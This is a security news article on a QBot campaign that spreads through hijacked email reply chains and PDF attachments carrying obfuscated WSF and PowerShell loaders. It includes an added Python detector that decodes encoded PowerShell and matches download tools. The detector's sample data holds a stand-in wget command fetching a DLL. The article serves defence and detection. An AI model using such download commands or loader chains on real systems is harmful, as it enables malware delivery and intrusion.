



A recent spike in QBot Trojan attacks has been observed, spreading via malicious emails written in various languages, including English, German, Italian, and French. The emails are crafted from genuine business letters obtained by the attackers and prompt the recipient to open an attached PDF file.

According to Kaspersky’s analysis this week, the campaign also uses reply-chain emails to make it more difficult for would-be victims to flag the messages as malicious. As the name suggests, reply chaining is a technique for accessing and replying to existing email exchanges from a listserv (or anywhere else), so that the interloping messages appear legitimate, unsuspicious, and authoritative.

This campaign represents a shift in tactics for the operators of QBot (aka QakBot or Pinkslipbot), who offer access as a service that other cybercriminals use to deliver various second-stage malware to already compromised targets. First discovered in 2007, QBot has undergone numerous modifications and enhancements over the years, becoming one of the most actively distributed malware strains in 2020.

According to security researchers, these latest improvements increase stealthiness and legitimacy. For example, the emails are crafted so that the stolen documents are modified as little as possible. They may contain links, or attachments containing links, to malicious sites.

“The messages were based on actual business letters obtained by the attackers, giving them the opportunity to participate in the communication thread with their own messages,” notes Kaspersky’s report.

QBot’s many layers of obfuscation

Regarding the attack flow, the PDF file contains a Windows Script File (WSF) containing an obfuscated PowerShell script encoded in Base64. When the PowerShell script is covertly run on the victim’s computer, it uses the wget utility to retrieve a DLL file from the remote server. This file is used to deliver the QBot malware to the victim’s computer. This builds on an existing tactic: last year, QBot operators began using DLL sideloading to deliver malware, a technique that avoids detection by placing legitimate and malicious files in a common directory.

The group has recently stepped up its operations, improved its services, infected systems, installed attack frameworks, and sold access to other groups, including Black Basta.

“WSF is obfuscated to evade detection to download further payloads,” explains Timothy Morris, Chief Security Advisor at Tanium. “The use of attack ‘chains’ or multiple steps can help circumvent some protections, as the full context of malicious behavior cannot be observed as a single activity.”
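The chain described above (a WSF launching Base64-encoded PowerShell that uses wget to fetch a DLL) can be triaged from process-creation telemetry by decoding the encoded command and correlating the individually weak signals on one process. This is an added example, not code from Kaspersky’s report or the original article; the event field names, host names, sample records and the `example.invalid` URL are constructed assumptions, and it assumes the WSF is run by Windows Script Host (wscript.exe or cscript.exe).

```python
import base64
import re

# PowerShell accepts -e, -ec, -enc ... -EncodedCommand; the value is Base64 of UTF-16LE text.
ENC_ARG = re.compile(r"\s-(?:e|ec|en\w*)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOADERS = re.compile(r"\b(wget|curl|iwr|invoke-webrequest)\b", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")  # Windows Script Host runs .wsf files

def decode_encoded_command(cmdline):
    """Return the decoded PowerShell script, or None if nothing decodes cleanly."""
    m = ENC_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except ValueError:  # covers malformed Base64 and malformed UTF-16
        return None

def findings(event):
    """Name each step of the described chain that one process-creation record shows."""
    hits = []
    if (event["parent_image"].lower().endswith(SCRIPT_HOSTS)
            and event["image"].lower().endswith("powershell.exe")):
        hits.append("script-host-spawned-powershell")
    if ".wsf" in event["parent_cmdline"].lower():
        hits.append("wsf-parent")
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        hits.append("base64-encoded-command")
        if DOWNLOADERS.search(script):
            hits.append("download-in-decoded-script")
        if ".dll" in script.lower():
            hits.append("dll-in-decoded-script")
    return hits

def triage(events, threshold=3):
    """Flag hosts where several individually weak signals line up on one process."""
    scored = [(e["host"], findings(e)) for e in events]
    return [(host, hits) for host, hits in scored if len(hits) >= threshold]

def _enc(script):  # builds the constructed sample data only
    return base64.b64encode(script.encode("utf-16-le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records; field names are assumptions
    {"host": "ws-01", "parent_image": r"C:\Windows\System32\wscript.exe",
     "parent_cmdline": r'wscript.exe "C:\Users\a\Downloads\doc.wsf"', "image": PS,
     "cmdline": "powershell.exe -nop -enc "
                + _enc(r"wget http://example.invalid/x.dll -OutFile $env:TEMP\x.dll")},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "parent_cmdline": "explorer.exe", "cmdline": "powershell.exe -enc " + _enc("Get-Date")},
]
```

Calling `triage(SAMPLE_EVENTS)` flags only `ws-01`; the encoded but benign admin command on `ws-02` yields a single finding and stays below the threshold.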

How to protect your business from QBot attacks

Morris said a variety of cybersecurity strategies are required to defend against multiple phases of the attack flow, from initial email to payload download to data exfiltration and theft.

“It’s important to have a defense-in-depth strategy that includes endpoint detection, monitoring, and protection technologies as well as modern web, network, and email security,” he says. “It’s also important to train users against these types of threats.”

Darren Guccione, CEO and co-founder of Keeper Security, says potential targets should be trained to recognize that, unlike phishing attacks that seem to come from random companies or governments, these malicious files containing malware can appear to be sent by someone they have exchanged emails with in the past.

“Threat actors are trying to piggyback on your relationship and trust level to get these contacts to download files,” he explains. “Employees should avoid unsafe clicks. Do not click on suspicious links and do not install untrusted software.”

Other email security best practices include verifying the sender and content of emails before downloading attachments, and hovering over embedded links to see the actual target URL. Defenders should also focus on ensuring that antivirus and antimalware solutions are up to date and deployed, and on keeping endpoints such as PCs, servers, and routers protected and patched.

According to Guccione, the recent resurgence of QBot and the addition of new modules and evasive techniques indicate that the malware is under active development, and companies should be prepared for the latest changes.

“It’s a very capable adversarial tool that defenders need to defend against,” Guccione explains.

Source: https://www.darkreading.com/remote-workforce/qbot-initial-access-attack-malware-pdf-wsf-combo
